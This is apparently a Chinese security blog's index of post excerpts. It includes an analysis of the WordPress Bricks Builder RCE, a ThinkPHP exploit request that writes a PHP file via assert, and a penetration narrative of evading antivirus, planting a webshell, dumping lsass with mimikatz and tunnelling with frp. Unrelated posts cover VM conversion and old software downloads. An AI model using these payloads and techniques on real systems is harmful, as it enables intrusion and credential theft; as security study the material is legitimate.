卡卡罗特取西经

前言朋友圈看到有人转发了一篇“CVE-2024-25600：WordPress Bricks Builder RCE”，感觉挺有意思，点进去看了下，可是从头到尾看得我有点迷糊，本着打破砂锅问到底的原则，本文试图以漏洞挖掘者的视角详细分析这个漏洞，试着讲清楚漏洞真正的成因，也在分析的过程中发现一些新的小东西，比如漏洞只影响1.9.1及之上的版本，网上都在说影响版本是<=1.9.6，其实应该是1.9.1 <= affected version <= 1.9.6 这里想说句题外话，如果一篇文章看得你云里雾里，那不排除一种可能，这篇文章质量不高~ 0x01 漏洞宏观流程漏洞最终触发点是eval执行了攻击者传入的恶意代码，导致任意代码执行其中参数$php_query_raw是攻击者可控的，路由也是攻击者可控的，最后在权限校验部分仅使用nonce进行权限校验，而nonce会泄露在前端源码中，至此《危险函数 -> 用户输入 -> 对应路由 -> 权限绕过》全部满足，最终导致了前台RCE（实际的细节有些复杂…) pyload如下 123456789101112131 ...

前言工作需要，去现场干活但不能用自己的电脑，考虑将我平时用的虚拟机拷贝过去，但我是intel mac下使用parallels desktop虚拟化的win10，现场是windows机器，pd虚拟机无法导入vmware workstation中，google、知乎、v2ex上各种搜索，不是不完整，就是不可用，最终通过自己尝试和国外一篇博客发现可行的方法，本文记录一下 过程整体思路是，mac下vmware fusion导入pd虚拟机，vmware fusion中将虚拟机导出为ovf格式，最终导入vmware workstation中 步骤1mac下安装好vmware fusion，截止到2024年12月22日，vmware fusion已经免费了，现在连破解许可都不用找了 步骤2vmware fusion直接导入pd虚拟机会报错 1Error23 无法导入虚拟机 需要使用qemu-img转换一下格式，安装qemu-img命令如下 1brew install qemu 我这边安装过程中提示还需要安装什么xcode(记不清了…)，需要一并安装，安装后使用如下命令转换（转换之前，虚拟机需要关机） ...

分享一个ThinkPHP GetShell时WAF绕过的小技巧 POC以如下POC为例 123456POST /?s=captcha&test=-1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36Content-Type: application/x-www-form-urlencodeds=file_put_contents('system.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert 可能绕过WAF的POC为 123456POST /?s=captcha&test=-1 HTTP/1.1Host: 127.0.0.1User-Agent: M ...

背景一个shiro命令执行并且有回显的口子，直接打各类内存马均失败，powershell一句话上线CS失败，查看进程发现有360、火绒，考虑到内存马不是我的研究方向，从文件下载方向突破 0x01 突破常规的文件下载方式bitsadmin、certutil、ftp等均被拦截，掏出储备的一个免杀的文件下载方式，可成功下载exe文件，尝试下载免杀远控并执行，发现无法执行（原因未知），改为下载魔改过的免杀冰蝎到对应的web目录下，成功连接webshell 0x02 再突破连接上webshell后，尝试执行远控仍旧失败，看来这条路行不通了，上传procdump抓取lsass的内存，想要下载到本地解密，发现不能下载（猜测可能是AV给拦截了），重新梳理下场景，想到既然是shiro的站点，那可以通过web服务下载文件，将文件移动到web目录后成功下载，随后通过mimikatz解出密码，密码真TM复杂啊，上传魔改过的免杀frp，建立隧道后，远程桌面成功连接 0x03 优化远程桌面连接后，发现屏幕字体非常非常小，应该是我本机虚拟机的分辨率太高导致的，此时可以先修改本机的屏幕分辨率，再远程桌面连接后大小刚刚 ...

0x01 前言看到一个免杀下载的方式，其中包含这样一条命令 1icacls %cd% /deny %username%:(OI)(CI)(DE,DC) 之前没接触过icacls，通过这篇笔记好好学习一下 0x02 介绍icacls：修改文件（文件夹）的权限 icacls是cacls和xcacls的增强版（但我在win10中搜索了一下，只搜到cacls，没搜到xcacls） windows中文件（文件夹）的权限分为2种：继承的权限（inherit permission）、明确设置的权限（explicit permission） 可通过执行icacls.exe %cd%来查看当前目录的权限 123456C:\Users\admin\Desktop>icacls.exe %cd%C:\Users\admin\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) DESKTOP-T86MV1G\ ...

0x01 前言接到一个Android APP渗透的任务，尝试用模拟器抓包发现闪退，看来反模拟器，手里有一台手机，型号是OPPO A57 5G，系统是ColorOS 14，手机和电脑在同一WiFi下，安装好burp证书，配置好代理，尝试抓包，发现无法抓取https包，好吧，开启折腾之旅 oppo安装证书https://www.cnblogs.com/tianpin/p/17503604.html 0x02 手机降级查阅相关资料得知，安卓7.0开始，想抓https包需要将证书装到系统证书目录下，想装到系统证书目录下需要root权限，现在问题变成如何root 之前手欠将ColorOS升级到14，我们都知道版本越高越不利于root，所以第一步是降级，ColorOS官方规定，降级需要一级一级降，不能一次降多级，所以我们要先降到ColorOS 13，再降到ColorOS 12，由于ColorOS最低只能降到手机出厂时的系统，我这边最低只能降到ColorOS 12 ColorOS 14降级到ColorOS 13https://www.ithome.com/0/742/497.htmColorOS ...

0x01 应用场景一个命令执行的口子 主机不出网 当前是nobody权限，web目录是root权限，写webshell没权限 通过一个ctf技巧搞了一个webshell，能上传文件但是不能执行命令 通过webshell将fscan上传到/tmp目录下，通过入口的命令执行漏洞执行fscan，发现内网有ssh弱口令 0x02 解决方案已知连接ssh的同时可以执行命令当时的想法是连接ssh，然后执行命令反弹shell，但是连接ssh需要交互式shell，第一时间想到expect，经测试主机上没有expect，然后想到通过python中的pexpect去做这件事，发现目标中的python缺少依赖，如果上传python依赖到对应的依赖库目录太麻烦了，最后想到用go去实现，代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950package mainimport ("bytes""fmt""log"&q ...

0x01 前言之前有段时间在搞小程序开发，搞来搞去最终放弃了，不过收获还是蛮多的，记得刚入行安全时，一直想学开发，总觉得不懂开发就搞不好安全，现在也算圆了这个执念，学习开发对安全是有帮助的，不过现在想对那时的自己说一句，不用专门学开发也可以把安全搞得好 0x02 简介一个简易的多用户微博系统，每个人都可以在上面留言，欢迎大家留言，地址：https://static-mp-5cacf972-c2bb-47de-9b31-244f0c9e5038.next.bspapp.com/article/#/ 截图如下：

程序流程如下 之前做红队时自己开发的工具，代码完全开源到GitHub，地址：https://github.com/ybdt/RuiningGather-Python

0x01 成果可下载15.3.2.62919（截止到2024.04.03的最新版）到12.5.1.44969之间的任意版本，如下图更旧的版本不能下载，原因见下文 0x02 起源想用旧版本向日葵测试一个功能，发现官网只提供最新版下载，故研究下如何下载旧版本 0x03 过程下载页面点击下载后，burp抓包，依次筛选每个请求包，发现如下请求包最像下载链接 如图可看到，根据参数versionid指定版本，试了下2225、2224都返回404，看来不是每个数字都有对应版本，写个python脚本生成1到2226的字典，请求包扔到Intruder中进行爆破，发现如上请求id返回302 ok，现在我们可以根据id下载对应版本 0x04 遗憾经测试，版本SunloginClient_12.5.0.44227_x64.exe及之前的版本，下载后会返回404，猜测可能官方给删除了